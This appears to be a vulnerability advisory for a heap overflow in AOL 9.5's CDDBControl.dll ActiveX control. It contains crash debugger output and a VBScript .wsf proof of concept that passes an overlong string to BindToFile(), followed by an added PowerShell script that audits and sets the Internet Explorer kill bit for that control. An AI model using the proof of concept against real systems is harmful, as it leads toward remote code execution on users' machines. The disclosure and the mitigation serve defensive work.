Product:
AOL 9.5
Vulnerability:
ActiveX Heap Overflow
Discussion:
The vulnerability is in the ActiveX control ("CDDBControl.dll").
Passing a long string to BindToFile() triggers the vulnerability.
Successful exploits allow remote attackers to execute arbitrary code.
Debugger Results:
(fd0.1274): Access violation - code c0000005 (!!! second chance !!!)
eax=7efefefe ebx=00000000 ecx=0020d7c0 edx=41414141
esi=03465df0 edi=02b82000 eip=10033011 esp=0020cdac
ebp=0020ed20 iopl=0 nv up ei pl zr na pe nc
Credits:
Celil 'karak0rsan' Unuver and murderkey
from Hellcode Research
tcc.hellcode.net
forum.hellcode.net
L4stW0rdZ: "hi francis, do you think we forget you ??? of course not, don't wait patch, don't support vendors
and security industry ...." - mkey
---------------
PoC .wsf script:
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target' />
<script language='vbscript'>
arg1=String(4000, "A")
arg2=1
target.BindToFile arg1 ,arg2
</script>
</job>
</package>
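
A defensive check for the control named in the PoC, as an added example that is not part of the original advisory: the PowerShell below reports whether the Internet Explorer kill bit is set for the CLSID and, with the sketch's own -Apply switch, sets it. The registry location and the 0x400 flag are the standard IE ActiveX kill-bit mechanism, not something the advisory states.

```powershell
# Added example: audit and set the IE "kill bit" for the control's CLSID.
# The CLSID comes from the PoC above; the registry path and the 0x400 flag
# are the standard Internet Explorer ActiveX kill-bit mechanism.
# Run from an elevated prompt; -Apply is a parameter of this sketch only.
param([switch]$Apply)

$Clsid   = '{BC8A96C6-3909-11D5-9001-00C04F4C3B9F}'
$KillBit = 0x400
$Name    = 'Compatibility Flags'

# Native view plus the 32-bit view on 64-bit Windows (32-bit IE reads WOW6432Node).
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($Root in $Roots) {
    if (-not (Test-Path -LiteralPath $Root)) { continue }   # view absent on 32-bit Windows
    $Key = Join-Path $Root $Clsid

    # Read current flags; a missing key or value counts as 0 (not blocked).
    $Flags = 0
    if (Test-Path -LiteralPath $Key) {
        $Prop = Get-ItemProperty -LiteralPath $Key -Name $Name -ErrorAction SilentlyContinue
        if ($Prop) { $Flags = [int]$Prop.$Name }
    }

    $Blocked = ($Flags -band $KillBit) -ne 0
    '{0}: flags=0x{1:X8} killbit={2}' -f $Key, $Flags, $Blocked

    if ($Apply -and -not $Blocked) {
        if (-not (Test-Path -LiteralPath $Key)) { New-Item -Path $Key -Force | Out-Null }
        # OR the bit in so any other compatibility flags already set are preserved.
        Set-ItemProperty -LiteralPath $Key -Name $Name -Type DWord -Value ($Flags -bor $KillBit)
        '  -> kill bit set'
    }
}
```

The kill bit stops Internet Explorer from instantiating the control from web content, which is the remote vector the advisory describes; it does not affect local script hosts such as the .wsf harness above.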